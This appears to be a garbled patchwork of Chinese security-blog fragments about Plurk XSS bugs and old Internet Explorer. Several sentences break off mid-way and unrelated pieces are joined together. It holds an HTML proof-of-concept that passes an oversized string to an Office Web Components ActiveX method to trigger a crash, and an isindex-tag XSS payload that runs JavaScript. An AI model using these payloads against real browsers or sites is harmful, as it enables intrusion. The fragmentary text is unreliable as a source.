Web、HTML、CSS、各家瀏覽器，都在持續演進著，以資安的觀點來看，演進的過程中包含了許多為了修補當初不安全設計而做得努力。IE，現在已經到IE 8了。

本文續「誰在看我的噗？第一回：DOM沙盒 vs 跨網站腳本漏洞（XSS）」。

許 多朋友透過email/msn/plurk問我，這個攻擊為何說IE<=7才能觸發？其實這個問題不是三言兩語解釋得清楚，所以我只在文中寫IE& lt;=7，不想讓已經很長的一篇變得更長，但沒想

sH:阿碼科技在blogspot上写的，鉴于国内的和谐性，于是乎转载来方便大众。

上星期天下午，下大雨，沒法出去，隨手開了Plurk，想到了Plurk之前公開的「XSS挑戰」，只要找到漏洞，證明並回報的噗友，就有Plurk hacker勳章可以拿，之前我

<html>
<object id=ctl
classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var sH = 'AAAA';
while (sH.length <= 256) sH+=sH;
ctl.DeleteRecordSourceIfUnused(sH);
</script>
</html>

貌似没什么人提过的标签:
<isindex action=javascript:alert(1) type=image>
在XSS的世界里尽情的游吧~

ECHO ：Query parameters echoed back / not echoed in HTTP response, respectively

输出：请求的参数或查询的内容是否在HTTP响应里返回输出过。

PRED：Request URL or